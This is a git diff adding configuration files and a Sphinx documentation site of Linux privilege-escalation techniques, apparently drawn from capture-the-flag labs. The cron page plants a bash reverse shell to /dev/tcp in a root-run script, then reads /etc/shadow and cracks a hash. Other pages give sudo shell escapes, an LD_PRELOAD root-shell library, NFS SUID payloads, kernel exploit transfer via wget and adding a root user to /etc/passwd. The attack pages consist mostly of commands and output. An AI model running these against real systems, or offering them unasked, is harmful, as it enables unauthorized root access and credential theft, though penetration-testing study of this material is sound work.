diff --git a/.github/workflows/documentation.yml b/.github/workflows/documentation.yml
new file mode 100644
index 0000000..7749521
--- /dev/null
+++ b/.github/workflows/documentation.yml
@@ -0,0 +1,28 @@
+name: Publish Monkeys using Sphinx
+
+on:
+ push:
+ branches:
+ - 'main'
+
+jobs:
+ build-docs:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout
+ uses: actions/checkout@v2
+ - uses: actions/setup-python@v3
+ - name: Install dependencies
+ run: |
+ pip install sphinx==5.1.0 sphinx_rtd_theme myst-parser sphinx-markdown-tables
+ - name: Build documentation
+ run: |
+ make html
+ - name: Deploy
+ uses: peaceiris/actions-gh-pages@v3
+ if: ${{ github.event_name == 'push' && github.ref == 'refs/heads/main' }}
+ with:
+ publish_branch: gh-pages
+ github_token: ${{ secrets.GITHUB_TOKEN }}
+ publish_dir: build/html/
+ force_orphan: true
\ No newline at end of file
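Review bot: The Deploy step hands `secrets.GITHUB_TOKEN` to a third-party action referenced by a movable tag (`peaceiris/actions-gh-pages@v3`), and the workflow declares no `permissions:` key, so the token's scope is whatever the repository default happens to be. Pin that action, and `actions/checkout@v2` and `actions/setup-python@v3` as well, to full commit SHAs, e.g. `uses: peaceiris/actions-gh-pages@<full-commit-sha>  # v3`, and add `permissions:` with `contents: write` on the `build-docs` job so the token can do no more than push to `gh-pages`. In the Install dependencies step only `sphinx==5.1.0` is pinned; `sphinx_rtd_theme`, `myst-parser` and `sphinx-markdown-tables` float, so a build that publishes to the live site can pick up an unreviewed release, which a fully pinned requirements file would prevent. `actions/setup-python@v3` is also used without a `python-version` input, which leaves the interpreter choice to the runner image.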
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..f5560af
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,33 @@
+# Byte-compiled / optimized / DLL files
+__pycache__/
+*.py[cod]
+*$py.class
+
+# Mac custom attributes file (Desktop Service Store)
+.DS_Store
+
+# PyCharm files
+.idea/
+
+# Instance Folder - used for run-time files
+instance/*.cfg
+instance/*.db
+instance/*.log
+instance/*.log*
+
+# Log Files
+instance/logs/
+*.log
+
+# Coverage output
+.coverage
+htmlcov/
+
+# Virtual Environment
+/venv/
+
+# pytest files
+.pytest_cache/
+
+# Not the static site, will be generated on push
+build/
\ No newline at end of file
diff --git a/Makefile b/Makefile
new file mode 100644
index 0000000..d0c3cbf
--- /dev/null
+++ b/Makefile
@@ -0,0 +1,20 @@
+# Minimal makefile for Sphinx documentation
+#
+
+# You can set these variables from the command line, and also
+# from the environment for the first two.
+SPHINXOPTS ?=
+SPHINXBUILD ?= sphinx-build
+SOURCEDIR = source
+BUILDDIR = build
+
+# Put it first so that "make" without argument is like "make help".
+help:
+ @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
+
+.PHONY: help Makefile
+
+# Catch-all target: route all unknown targets to Sphinx using the new
+# "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS).
+%: Makefile
+ @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
diff --git a/README.md b/README.md
index 7f843ac..9152236 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,32 @@
-# red-escalation
-Privilege escalation
+# Monkeys
+
+![Publish Monkeys using Sphinx](https://github.com/tymyrddin/red-escalation/workflows/Publish%20Monkeys%20using%20Sphinx/badge.svg?branch=main)
+ Deployed: https://tymyrddin.github.io/red-escalation/
+
+Built with [Sphinx](https://www.sphinx-doc.org) using a [theme](https://github.com/readthedocs/sphinx_rtd_theme) provided
+by [Read the Docs](https://readthedocs.org/).
+
+## Requirements
+
+* sphinx — sphinx package
+* sphinx-rtd-theme — a theme package
+* myst-parser — parsing `.md` files
+* sphinx-markdown-tables — package for Markdown tables support
+
+## Usage
+
+Add or change documents in the source folder.
+
+Make the build:
+```bash
+$ make html
+```
+
+## Problems or Suggestions
+
+This project welcomes contributions and suggestions.
+
+[Open an issue here](https://github.com/tymyrddin/red-escalation/issues)
+
+## Mind
+Where you stand depends on where you sit, and all threats are cross-vector threats. Without a clear mandate for testing, measuring and reporting actual improvements in security, attempts at improving security makes absolutely no sense, not even for the low-hanging fruit.
diff --git a/make.bat b/make.bat
new file mode 100644
index 0000000..dc1312a
--- /dev/null
+++ b/make.bat
@@ -0,0 +1,35 @@
+@ECHO OFF
+
+pushd %~dp0
+
+REM Command file for Sphinx documentation
+
+if "%SPHINXBUILD%" == "" (
+ set SPHINXBUILD=sphinx-build
+)
+set SOURCEDIR=source
+set BUILDDIR=build
+
+%SPHINXBUILD% >NUL 2>NUL
+if errorlevel 9009 (
+ echo.
+ echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
+ echo.installed, then set the SPHINXBUILD environment variable to point
+ echo.to the full path of the 'sphinx-build' executable. Alternatively you
+ echo.may add the Sphinx directory to PATH.
+ echo.
+ echo.If you don't have Sphinx installed, grab it from
+ echo.https://www.sphinx-doc.org/
+ exit /b 1
+)
+
+if "%1" == "" goto help
+
+%SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O%
+goto end
+
+:help
+%SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O%
+
+:end
+popd
diff --git a/source/_static/css/custom.css b/source/_static/css/custom.css
new file mode 100644
index 0000000..f66ae82
--- /dev/null
+++ b/source/_static/css/custom.css
@@ -0,0 +1,36 @@
+h1 {
+ color: #DD0000;
+}
+
+a {
+ color: #DD0000;
+}
+
+a:hover {
+ color: #FF0000;
+}
+
+.wy-nav .wy-menu-vertical header {
+ color: #DD0000
+}
+
+.wy-menu-vertical header, .wy-menu-vertical p.caption {
+ color: #DD0000;
+}
+
+.wy-side-nav-search {
+ background-color: #333333;
+ color: #fcfcfc;
+}
+
+.wy-side-nav-search input[type="text"] {
+ width: 100%;
+ border-radius: 0px;
+ padding: 6px 12px;
+ border-color: #DD0000;
+}
+
+.highlight {
+ background: #333;
+ color: #ddd;
+}
\ No newline at end of file
diff --git a/source/_templates/footer.html b/source/_templates/footer.html
new file mode 100644
index 0000000..c440f74
--- /dev/null
+++ b/source/_templates/footer.html
@@ -0,0 +1,4 @@
+{% extends "!footer.html" %}
+{%- block contentinfo %}
+ Unseen University, 2022
+{% endblock %}
diff --git a/source/conf.py b/source/conf.py
new file mode 100644
index 0000000..34b5a86
--- /dev/null
+++ b/source/conf.py
@@ -0,0 +1,99 @@
+# Configuration file for the Sphinx documentation builder.
+#
+# For the full list of built-in configuration values, see the documentation:
+# https://www.sphinx-doc.org/en/master/usage/configuration.html
+
+# -- Project information -----------------------------------------------------
+# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information
+
+project = 'Monkeys know what tree to climb'
+copyright = '2022, Ty Myrddin'
+author = 'Ty Myrddin'
+release = '0.1'
+
+# -- General configuration ---------------------------------------------------
+
+# Add any Sphinx extension module names here, as strings. They can be
+# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
+# ones.
+extensions = [
+ 'myst_parser',
+ 'sphinx_markdown_tables',
+ 'sphinx.ext.intersphinx',
+]
+
+source_suffix = ['.rst', '.md']
+
+# Add any paths that contain templates here, relative to this directory.
+templates_path = ['_templates']
+
+# List of patterns, relative to source directory, that match files and
+# directories to ignore when looking for source files.
+# This pattern also affects html_static_path and html_extra_path.
+exclude_patterns = []
+
+
+# -- Options for HTML output -------------------------------------------------
+
+# The theme to use for HTML and HTML Help pages. See the documentation for
+# a list of builtin themes.
+#
+html_theme = 'sphinx_rtd_theme'
+
+html_theme_options = {
+ 'display_version': True,
+ 'prev_next_buttons_location': 'bottom',
+ 'style_external_links': True,
+ # Toc options
+ 'collapse_navigation': False,
+ 'sticky_navigation': False,
+ 'navigation_depth': 3,
+ 'includehidden': True,
+ 'titles_only': False
+}
+
+html_title = "Monkeys know what tree to climb"
+html_logo = "img/logo.png"
+html_favicon = "img/favicon.ico"
+
+
+# Add any paths that contain custom static files (such as style sheets) here,
+# relative to this directory. They are copied after the builtin static files,
+# so a file named "default.css" will overwrite the builtin "default.css".
+html_static_path = ['_static']
+
+# These paths are either relative to html_static_path
+# or fully qualified paths (eg. https://...)
+html_css_files = [
+ 'css/custom.css',
+]
+
+# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
+html_show_sphinx = False
+
+# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
+html_show_copyright = False
+
+
+# Intersphinx
+intersphinx_mapping = {
+ "attack-trees": ("https://tymyrddin.github.io/attack-trees/", None),
+ "cheatsheets": ("https://tymyrddin.github.io/cheatsheets/", None),
+ "e2ee-threat-model":("https://tymyrddin.github.io/e2ee-threat-model/", None),
+ "da-threat-model":("https://tymyrddin.github.io/da-threat-model/", None),
+ "se-threat-model":("https://tymyrddin.github.io/se-threat-model/", None),
+ "app-threat-model":("https://tymyrddin.github.io/app-threat-model/", None),
+ "cicd-threat-model":("https://tymyrddin.github.io/cicd-threat-model/", None),
+ "linux-pc-mitigations":("https://tymyrddin.github.io/linux-pc-mitigations/", None),
+ "linux-server-mitigations":("https://tymyrddin.github.io/linux-server-mitigations/", None),
+ "data-mitigations":("https://tymyrddin.github.io/data-mitigations/", None),
+ "webserver-mitigations":("https://tymyrddin.github.io/webserver-mitigations/", None),
+ "mailserver-mitigations":("https://tymyrddin.github.io/mailserver-mitigations/", None),
+ "network-mitigations":("https://tymyrddin.github.io/network-mitigations/", None),
+ "app-mitigations": ("https://tymyrddin.github.io/app-mitigations/", None),
+ "android-mitigations": ("https://tymyrddin.github.io/android-mitigations/", None),
+ "windows-pc-mitigations": ("https://tymyrddin.github.io/windows-pc-mitigations/", None),
+ "macos-mitigations": ("https://tymyrddin.github.io/macos-mitigations/", None),
+ "ios-mitigations": ("https://tymyrddin.github.io/ios-mitigations/", None),
+}
+myst_url_schemes = ["http", "https", ]
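Review bot: `intersphinx_mapping` makes each build fetch an inventory from eighteen external sites, and nothing in the file bounds or explains that. As far as I know the Sphinx default is no timeout, so a slow or unreachable site could stall the CI build. Consider adding `intersphinx_timeout = 10` and replacing the bare `# Intersphinx` comment with one stating that these are sibling documentation sites resolved at build time, which is what makes references such as `cheatsheets:docs/enumeration/linux-post` work. On style, the entries from `"e2ee-threat-model"` through `"network-mitigations"` lack the space after the colon that the other entries have, and `myst_url_schemes = ["http", "https", ]` has a stray trailing comma and space.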
diff --git a/source/docs/linux/README.md b/source/docs/linux/README.md
new file mode 100644
index 0000000..6790818
--- /dev/null
+++ b/source/docs/linux/README.md
@@ -0,0 +1,29 @@
+# Introduction
+
+## What?
+
+There are many ways to escalate linux privileges. These are the most common methods based on common real-world
+misconfigurations and flaws.
+
+## Why?
+
+Gain access to additional users, hosts, and resources, be able to take action, like install software, to get user
+data that can possibly give access to even more sites or systems, destroy or alter audit trails to hide tracks of
+having been there, etc.
+
+## How?
+
+* [Kernel vulnerability exploits](kernel.md)
+* [Exploit sudo misconfigurations](sudo.md)
+* [SUID and SGID exploits](suid.md)
+* [Exploit capable programs](capabilities.md)
+* [Cron jobs exploits](cron.md)
+* [Path exploits](path.md)
+* [NFS exploits](nfs.md)
+* [Linux escalation resources](resources.md)
+
+
+
+
+
+
diff --git a/source/docs/linux/capabilities.md b/source/docs/linux/capabilities.md
new file mode 100644
index 0000000..97c310b
--- /dev/null
+++ b/source/docs/linux/capabilities.md
@@ -0,0 +1,35 @@
+# Exploit capable programs
+
+## Attack tree
+
+```text
+1 Become root on Linux via capabilities
+ 1.1 Check for capable programs
+ 1.2 Leverage program
+```
+
+## Example: vim
+
+To check for capable programs, use the `getcap` tool:
+```text
+karen@target:~$ getcap -r / 2>/dev/null
+/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
+/usr/bin/traceroute6.iputils = cap_net_raw+ep
+/usr/bin/mtr-packet = cap_net_raw+ep
+/usr/bin/ping = cap_net_raw+ep
+/home/karen/vim = cap_setuid+ep
+/home/ubuntu/view = cap_setuid+ep
+```
+
+[Leverage vim](https://gtfobins.github.io/gtfobins/vim/) and execute a shell using python:
+
+```text
+vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
+```
+
+## Notes
+
+Another method system administrators can use to increase the privilege level of a process or binary is by capabilities.
+Capabilities help manage privileges at a more granular level. If a SOC analyst needs to use a tool that needs to
+initiate socket connections, the capabilities of the binary can be changed such that it would get through its task
+without needing a higher privilege user.
diff --git a/source/docs/linux/cron.md b/source/docs/linux/cron.md
new file mode 100644
index 0000000..c518f1e
--- /dev/null
+++ b/source/docs/linux/cron.md
@@ -0,0 +1,102 @@
+# Cron jobs exploits
+
+## Attack tree
+
+```text
+1 Become root on Linux using cron jobs
+ 1.1 Find cron jobs from current user that run as root and may be exploited
+ 1.2 Change the script or program to start a reverse shell as root
+ 1.3 Listen and wait for it
+```
+
+## Example: Backup script
+
+`ssh` into the target machine and look at `/etc/crontab`:
+
+```text
+Last login: Sun Jun 20 10:17:43 2021 from 10.9.2.27
+$ cat /etc/crontab
+...
+#
+* * * * * root /antivirus.sh
+* * * * * root antivirus.sh
+* * * * * root /home/karen/backup.sh
+* * * * * root /tmp/test.py
+```
+
+Karen's backup script and test.py both run as root. Use either.
+
+On the attack machine start a listener:
+
+```text
+└─$ nc -lnvp 4444
+Ncat: Version 7.92 ( https://nmap.org/ncat )
+Ncat: Listening on :::4444
+Ncat: Listening on 0.0.0.0:4444
+```
+
+Change the backup script:
+
+```text
+$ ls
+backup.sh
+$ mv backup.sh backup.sh.old
+$ touch backup.sh
+$ nano backup.sh
+```
+
+Put this code in:
+
+```text
+#!/bin/bash
+
+bash -i >& /dev/tcp//4444 0>&1
+```
+
+And make the script executable:
+
+```text
+$ chmod +x backup.sh
+```
+
+On the attack machine:
+
+```text
+└─# nc -lnvp 4444
+Ncat: Version 7.92 ( https://nmap.org/ncat )
+Ncat: Listening on :::4444
+Ncat: Listening on 0.0.0.0:4444
+Ncat: Connection from .
+Ncat: Connection from :55932.
+bash: cannot set terminal process group (12785): Inappropriate ioctl for device
+bash: no job control in this shell
+root@target:~# python3 -c 'import pty; pty.spawn("/bin/bash")'
+python3 -c 'import pty; pty.spawn("/bin/bash")'
+root@target:~# cat /etc/shadow | grep matt
+cat /etc/shadow | grep matt
+matt:$6$WHmIjebL7MA7KN9A$C4UBJB4WVI37r.Ct3Hbhd3YOcua3AUowO2w2RUNauW8IigHAyVlHzhLrIUxVSGa.twjHc71MoBJfjCTxrkiLR.:18798:0:99999:7:::
+root@target:~# cat /etc/passwd | grep matt
+cat /etc/passwd | grep matt
+matt:x:1002:1002::/home/matt:/bin/sh
+```
+
+On the attack machine, copy matt's shadow in `shadow.txt` and matt's password in `password.txt`. Crack.
+
+```text
+$ unshadow passwd.txt shadow.txt > crackmatt.txt
+
+$ john --wordlist=/usr/share/wordlists/rockyou.txt crackmatt.txt
+Using default input encoding: UTF-8
+Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 512/512 AVX512BW 8x])
+Cost 1 (iteration count) is 5000 for all loaded hashes
+Will run 4 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+123456 (matt)
+1g 0:00:00:00 DONE (2022-09-25 23:30) 3.225g/s 3303p/s 3303c/s 3303C/s 123456..bethany
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed.
+```
+
+## Notes
+
+Not really exploit usage, but based on files with incorrectly installed authorities.
\ No newline at end of file
diff --git a/source/docs/linux/kernel.md b/source/docs/linux/kernel.md
new file mode 100644
index 0000000..b0a2b42
--- /dev/null
+++ b/source/docs/linux/kernel.md
@@ -0,0 +1,67 @@
+# Kernel vulnerability exploits
+
+## Attack tree
+
+```text
+1 Become root on Linux via kernel exploit
+ 1.1 Identify the kernel version (AND)
+ 1.2 Detect vulnerabilities (AND)
+ 1.3 Develop or acquire exploit code (AND)
+ 1.4 Transfer the exploit to the target machine (AND)
+ 1.5 Execute the exploit on the target
+```
+
+## Example: CVE-2015-1328
+
+For [CVE-2015-1328](https://ubuntu.com/security/CVE-2015-1328) exploit-db lists several possible exploits:
+
+* [37292](https://www.exploit-db.com/exploits/37292)
+* [37293](https://www.exploit-db.com/exploits/37293)
+* [40688](https://www.exploit-db.com/exploits/40688) <= Metasploit, maybe there are other exploits too
+
+### Using 37292
+
+1. Create a local file `37292.c` in the `/tmp/` directory and paste the code in the file
+2. Start a local python http server: `python -m http.server 8080`
+3. From the target machine: `wget http://:8888/37292.c`
+4. Compile on target machine: `gcc CVE-2015-1328.c -o 37292`
+5. Make executable: `chmod +x 37292`
+6. Check current user: `id`
+7. Run the compiled exploit: `./exp`
+8. Check current user: `id`
+
+### Using 40688
+
+1. Upgrade existing shell (meterpreter, ssh, or a basic command shell) to `meterpreter` session
+
+Open a new meterpreter session with:
+
+```text
+sessions -u
+```
+
+Or upgrade the most recently opened session to meterpreter:
+
+```text
+sessions -u -1
+```
+
+2. Load the `local_exploit_suggester` module in `msfconsole`:
+
+```text
+meterpreter> use post/multi/recon/local_exploit_suggester
+```
+
+3. Set the SESSION option for the module to the session ID of the meterpreter session, and `run`
+4. Test the exploit modules recommended by `local_exploit_suggester`. The first few modules in the output usually
+have a higher chance of working successfully.
+5. Load a module, set the module options and `exploit`
+6. An exploit can fail for many reasons. If not works, try the next one or install missing components for it to run.
+
+## Notes
+
+A failed kernel exploit can lead to a system crash. Make sure this potential outcome is acceptable within the scope of
+the penetration testing engagement before attempting a kernel exploit.
+
+You can transfer the exploit code from your machine to the target system using the SimpleHTTPServer Python module and
+wget respectively.
diff --git a/source/docs/linux/nfs.md b/source/docs/linux/nfs.md
new file mode 100644
index 0000000..2e019bd
--- /dev/null
+++ b/source/docs/linux/nfs.md
@@ -0,0 +1,104 @@
+# NFS exploits
+
+## Attack tree
+
+```text
+1 Become root on Linux via NFS exploits
+ 1.1 Look for no_root_squash shares
+ 1.2 Mount share
+ 1.3 Create a payload
+ 1.3.1 Bash binary with an SUID bit
+ 1.3.2 C binary with an SUID bit
+ 1.4 Execute the payload on the target machine to escalate privileges
+ 1.5 Unmount the shared directory in the attacker machine
+```
+
+## Example: /tmp share
+
+1. Get information:
+
+```text
+$ ps aux | grep nfsd
+$ cat /etc/exports
+```
+There is a `/tmp` share with `no_root_squash` set.
+
+2. Shares with the `no_root_squash` option can possibly be modified and executed as root.
+3. On the attacker machine install the NFS client package: `sudo apt install nfs-common`
+4. On the attacker machine, create a directory to host the NFS share: `mkdir /tmp/nfs`
+5. With `sudo`, mount the remote share in the `/tmp/nfs` directory
+
+```text
+sudo mount -o rw,vers=2 :/tmp /tmp/nfs
+```
+
+Or:
+
+```text
+sudo mount -t nfs :/tmp /tmp/nfs
+```
+6. Payload
+
+Bash binary with an SUID bit:
+
+```text
+sudo cp /bin/bash /tmp/nfs/bash && sudo chmod u+s /tmp/nfs/bash
+```
+
+C binary with an SUID bit - you may need to change the `/usr/bin/bash` to `/bin/bash`, depending on location of `bash`
+in the target machine:
+
+```text
+#include
+#include
+#include
+
+int main() {
+ setresuid(0, 0, 0);
+ setuid(getuid());
+ system("/usr/bin/bash");
+ return 0;
+}
+```
+
+Compile:
+
+```text
+gcc payload.c -o payload && sudo rm /tmp/nfs/payload 2>/dev/null; sudo cp payload /tmp/nfs
+```
+
+Set de SUID bit:
+
+```text
+sudo chmod u+s /tmp/nfs/payload
+```
+
+7. In the target machine, execute the payload to escalate privileges:
+
+```text
+:/tmp$ ./bash -p
+# whoami
+root
+# exit
+```
+
+```text
+:/tmp$ ./payload
+:/tmp# id
+uid=0(root) gid=1000(low) ...
+```
+
+8. Unmount the shared directory in the attacker machine:
+
+```text
+sudo umount /tmp/nfs
+```
+
+## Notes
+
+The NFS configuration file is `/etc/exports`:
+
+* `no_root_squash`: This option basically gives authority to the root user on the client (us, our attacker host)
+to access files on the NFS server as root. This is bad, as we can create malicious files on the NFS share as the
+root user.
+* `no_all_squash`: This is similar to no_root_squash option but applies to non-root users.
diff --git a/source/docs/linux/path.md b/source/docs/linux/path.md
new file mode 100644
index 0000000..1ac6857
--- /dev/null
+++ b/source/docs/linux/path.md
@@ -0,0 +1,30 @@
+# Path exploits
+
+## Attack tree
+
+```text
+1 Become root on Linux
+ 1.1 Search for files with incorrectly installed authorities that are on PATH (OR)
+ 1.2 Change PATH
+ 1.3 Use script or program
+```
+
+## Example
+
+1. What folders are located under `$PATH`?
+
+````text
+$ echo $PATH
+````
+2. Does current user have `write` privileges for any of these folders?
+
+```text
+find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort
+```
+
+3. Can `$PATH` be modified?
+4. Is there a script/application that will be affected by this vulnerability?
+
+## Notes
+
+Not really exploit usage, but based on files with incorrectly installed authorities.
\ No newline at end of file
diff --git a/source/docs/linux/resources.md b/source/docs/linux/resources.md
new file mode 100644
index 0000000..a9a2821
--- /dev/null
+++ b/source/docs/linux/resources.md
@@ -0,0 +1,14 @@
+# Linux escalation resources
+
+## Tools
+
+* [LinEnum](https://github.com/rebootuser/LinEnum)
+* [PEASS-ng](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) is a script that searches for possible paths to escalate privileges on Linux/Unix* hosts. It also enumerates the system.
+* [Linux Exploit Suggester 2](https://github.com/jondonas/linux-exploit-suggester-2) returns a list of possible CVEs, exploits, and exploit POCs (Proof of Concept) for the running Linux kernel.
+* [GTFOBins](https://gtfobins.github.io/) is a curated list of Unix binaries that can used to bypass local security restrictions in misconfigured systems.
+* [Traitor](https://github.com/liamg/traitor) takes advantage of local misconfigurations and vulnerabilities (including most of GTFOBins) in order to pop a root shell. These are primarily misconfigurations, not exploits.
+
+## Cheatsheets
+
+* [Linux post exploitation enumeration](cheatsheets:docs/enumeration/linux-post)
+* [GTFObins](https://gtfobins.github.io/)
\ No newline at end of file
diff --git a/source/docs/linux/sudo.md b/source/docs/linux/sudo.md
new file mode 100644
index 0000000..d1de8fe
--- /dev/null
+++ b/source/docs/linux/sudo.md
@@ -0,0 +1,87 @@
+# Exploit sudo misconfigurations
+
+## Attack tree
+
+```text
+1 Become root on Linux via sudo exploit
+ 1.1 Find which commands current user is allowed to use (sudo -l) (AND)
+ 1.2 Exploit the parameters of a command that is allowed to be executed with root permissions
+ 1.2.1 sudo find /etc/passwd -exec /bin/sh \; (OR)
+ 1.2.2 sudo vim -c '!sh' (OR)
+ 1.2.3 sudo awk 'BEGIN {system(“/bin/sh”)}' (OR)
+ 1.2.4 Other commands that are allowed to be executed with root permissions to invoke a shell
+```
+
+## Example: find
+
+### LD_PRELOAD
+
+`LD_PRELOAD` allows program to
+[use/load shared libraries](https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/).
+If the `env_keep` option is enabled we can generate a
+shared library which will be loaded and executed before the program is run. The `LD_PRELOAD` option will be ignored
+if the real user ID is different from the effective user ID.
+
+1. Check for `env_keep+=LD_PRELOAD` (using `sudo -l`)
+2. Write a simple C code compiled as a share object (`.so` extension) file
+
+```text
+#include
+#include
+#include
+
+void _init() {
+unsetenv("LD_PRELOAD");
+setgid(0);
+setuid(0);
+system("/bin/bash");
+}
+```
+
+Save as shell.c and compile:
+
+ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
+
+Use this shared object file when launching any program the user can run with sudo.
+
+3. Run the program with sudo rights and the `LD_PRELOAD` option pointing to the `.so` file
+
+```text
+sudo LD_PRELOAD=/home/user/ldpreload/shell.so find
+```
+
+This will result in a shell spawn with root privileges.
+
+### Another find
+
+Another [find in GTFObins](https://gtfobins.github.io/gtfobins/find/) for escalating privileges with `find`:
+
+```text
+Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1029-aws x86_64)
+...
+$ sudo -l
+Matching Defaults entries for karen on ip-10-10-0-32:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+User karen may run the following commands on ip-10-10-0-32:
+ (ALL) NOPASSWD: /usr/bin/find
+ (ALL) NOPASSWD: /usr/bin/less
+ (ALL) NOPASSWD: /usr/bin/nano
+$ id
+uid=1001(karen) gid=1001(karen) groups=1001(karen)
+$ sudo find . -exec /bin/sh \; -quit
+# id
+uid=0(root) gid=0(root) groups=0(root)
+```
+
+## Notes
+
+The `sudo` command, by default, allows for running a program with root privileges. System administrators sometimes
+give regular users some flexibility on their privileges. For example, a junior SOC analyst may need to use Nmap
+but would not be cleared for full root access. The system administrator can allow this user to only run Nmap with
+root privileges while keeping its regular privilege level throughout the rest of the system.
+
+Any user can check its current situation related to root privileges using the `sudo -l` command.
+
+Use [GTFObins](https://gtfobins.github.io/) for gathering information on how any program, on which a user may have sudo rights, can be used.
diff --git a/source/docs/linux/suid.md b/source/docs/linux/suid.md
new file mode 100644
index 0000000..28ee2d9
--- /dev/null
+++ b/source/docs/linux/suid.md
@@ -0,0 +1,50 @@
+# SUID and SGID exploits
+
+## Attack tree
+
+```text
+1 Become root on Linux via SUID
+ 1.1 List files that have SUID or SGID bits set (AND)
+ 1.3 Exploit
+```
+
+## Example: nano
+
+### Crack passwords file
+
+1. List files that have `SUID` or `SGID` bits set:
+
+```text
+find / -type f -perm -04000 -ls 2>/dev/null
+```
+
+2. Compare these executables with [GTFOBins SUID](https://gtfobins.github.io/#+suid). The nano text editor has the
+SUID bit set
+3. Read `/etc/passwd` and `/etc/shadow` using nano.
+4. Copy contant to local `passwd.txt` resp `shadow.txt` files.
+5. Use the `unshadow` tool to create a file crackable by John the Ripper
+
+```text
+unshadow passwd.txt shadow.txt > passwords.txt
+```
+
+### Add a user
+
+The other option would be to add a new user that has root privileges.
+
+1. Using the `openssl` tool, create a password hash for a new user:
+
+```text
+openssl passwd -1 -salt
+```
+
+2. Add this password with a username to the `/etc/passwd` file. Use `root:/bin/bash` to give this user a root shell.
+3. Switch to this user.
+
+## Notes
+
+SUID (Set-user Identification) and SGID (Set-group Identification) allow files to be executed with the
+permission level of the file owner or the group owner, respectively.
+
+Such files have an `s` bit set showing their special permission level. To find binaries known to be exploitable
+when the SUID bit is set see [GTFObins SUID](https://gtfobins.github.io/#+suid).
diff --git a/source/docs/thm/README.md b/source/docs/thm/README.md
new file mode 100644
index 0000000..dd49eb4
--- /dev/null
+++ b/source/docs/thm/README.md
@@ -0,0 +1,14 @@
+# Introduction
+
+## What?
+
+Not an exhaustive list of all escalation methods, but does include some "edge-case" tactics that may be seen in a
+Capture the Flag (CTF) exercise.
+
+## Why?
+
+To build experience with which tree climbing and monkeying about.
+
+## How?
+
+* [Steel Mountain](steel-mountain.md)
\ No newline at end of file
diff --git a/source/docs/thm/steel-mountain.md b/source/docs/thm/steel-mountain.md
new file mode 100644
index 0000000..0cd964a
--- /dev/null
+++ b/source/docs/thm/steel-mountain.md
@@ -0,0 +1 @@
+# Steel Mountain
\ No newline at end of file
diff --git a/source/docs/windows/README.md b/source/docs/windows/README.md
new file mode 100644
index 0000000..3314eb1
--- /dev/null
+++ b/source/docs/windows/README.md
@@ -0,0 +1,17 @@
+# Introduction
+
+## What?
+
+Windows presents an enormous attack surface and most companies run Windows hosts, so we will often find ourselves
+gaining access to Windows machines. These are all methods on common real-world misconfigurations and flaws
+in modern and legacy Windows Server and Desktop versions that may be present in a client environment.
+
+## Why?
+
+After gaining a foothold, enumeration is the key to privilege escalation. Elevating privileges will provide more
+options for persistence and may reveal information stored locally that can further our access in the environment.
+
+## How?
+
+
+
diff --git a/source/img/favicon.ico b/source/img/favicon.ico
new file mode 100644
index 0000000..cda29d6
Binary files /dev/null and b/source/img/favicon.ico differ
diff --git a/source/img/logo.png b/source/img/logo.png
new file mode 100644
index 0000000..087760c
Binary files /dev/null and b/source/img/logo.png differ
diff --git a/source/index.rst b/source/index.rst
new file mode 100644
index 0000000..2553550
--- /dev/null
+++ b/source/index.rst
@@ -0,0 +1,32 @@
+Monkeys know what tree to climb
+===========================================================
+
+.. toctree::
+ :maxdepth: 1
+ :includehidden:
+ :caption: Linux escalation
+
+ docs/linux/README.md
+ docs/linux/kernel.md
+ docs/linux/sudo.md
+ docs/linux/suid.md
+ docs/linux/capabilities.md
+ docs/linux/cron.md
+ docs/linux/path.md
+ docs/linux/nfs.md
+ docs/linux/resources.md
+
+.. toctree::
+ :maxdepth: 1
+ :includehidden:
+ :caption: Windows escalation
+
+ docs/windows/README.md
+
+.. toctree::
+ :maxdepth: 1
+ :includehidden:
+ :caption: THM Scenarios
+
+ docs/thm/README.md
+ docs/thm/steel-mountain.md
\ No newline at end of file